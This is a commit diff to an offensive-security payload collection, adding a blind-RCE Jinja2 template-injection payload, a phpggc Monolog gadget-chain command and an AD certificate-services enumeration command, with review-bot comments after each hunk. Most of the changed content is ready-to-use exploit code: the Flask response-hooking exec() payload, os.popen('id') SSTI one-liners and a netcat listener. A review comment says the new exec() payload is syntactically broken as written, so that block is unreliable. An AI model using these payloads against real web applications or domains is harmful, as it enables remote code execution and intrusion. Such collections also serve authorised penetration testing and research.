Blind SSTI Jinja

This commit is contained in:
Swissky 2022-10-02 12:24:39 +02:00
parent 444d8ad169
commit 4ed3e3b6b9
4 changed files with 22 additions and 6 deletions

View File

@ -133,6 +133,7 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
```powershell ```powershell
phpggc monolog/rce1 'phpinfo();' -s phpggc monolog/rce1 'phpinfo();' -s
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
``` ```
## PHP Phar Deserialization ## PHP Phar Deserialization
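Review bot: the gadget name casing on the new `phpggc Monolog/RCE2 ...` line differs from `monolog/rce1` on the line above; keep one convention, and a short comment noting that `-p phar -o` writes a phar archive rather than the raw serialized chain would make the difference between the two lines clear to the reader.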

View File

@ -2225,7 +2225,7 @@ secretsdump.py -k -no-pass target.lab.local
* Find ADCS Server * Find ADCS Server
* `crackmapexec ldap domain.lab -u username -p password -M adcs` * `crackmapexec ldap domain.lab -u username -p password -M adcs`
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping` * Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`
#### ESC1 - Misconfigured Certificate Templates #### ESC1 - Misconfigured Certificate Templates
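Review bot: the added `certutil -dump` is appended to the existing bullet with a comma, so it reads as a continuation of the `-config - -ping` command rather than a second one; give it its own sub-bullet with a word on what it lists, and keep the `certutil.exe` spelling consistent with the command before it.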

View File

@ -9,7 +9,7 @@ You can also contribute with a :beers: IRL, or using the sponsor button
[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo) [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
An alternative display version is available at https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/. An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/).
<p align="center"> <p align="center">
<img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png"> <img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png">

View File

@ -43,6 +43,7 @@
- [Jinja2 - Read remote file](#jinja2---read-remote-file) - [Jinja2 - Read remote file](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution) - [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
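Review bot: the new table-of-contents entry reads `Forcing output on blind RCE` while its anchor is `#jinja2---forcing-output-on-blind-rce` and the sibling entries all carry the `Jinja2 - ` prefix; rename it to `[Jinja2 - Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)` so the text matches both the heading and the list style.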
@ -496,15 +497,30 @@ Listen for connection
nc -lnvp 8000 nc -lnvp 8000
``` ```
#### Jinja2 - Forcing output on blind RCE
You can import Flask functions to return an output from the vulnerable page.
```py
{{
x.__init__.__builtins__.exec("from flask import current_app, after_this_request
@after_this_request
def hook(*args, **kwargs):
from flask import make_response
r = make_response('Powned')
return r
")
}}
```
#### Exploit the SSTI by calling os.popen().read() #### Exploit the SSTI by calling os.popen().read()
These payloads are context-free, and do not require anything, except being in a jinja2 Template object: These payloads are context-free, and do not require anything, except being in a jinja2 Template object:
```python ```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
``` ```
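Review bot: the `exec("...")` argument in the new block is a plain double-quoted string containing literal line breaks, which Python rejects as a syntax error before any of it runs; either escape the breaks as `\n` or switch to a triple-quoted string. The leading `x` is also never introduced; say what it stands for (a placeholder for an object reachable from the template, as the `self._TemplateReference__context` payloads in the next section show). Finally, the fence is tagged ```py while the rest of the file uses ```python.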
@ -512,9 +528,7 @@ We can use these shorter payloads (this is the shorter payloads known yet):
```python ```python
{{ cycler.__init__.__globals__.os.popen('id').read() }} {{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }} {{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }} {{ namespace.__init__.__globals__.os.popen('id').read() }}
``` ```
@ -1092,3 +1106,4 @@ layout template:
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) * [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)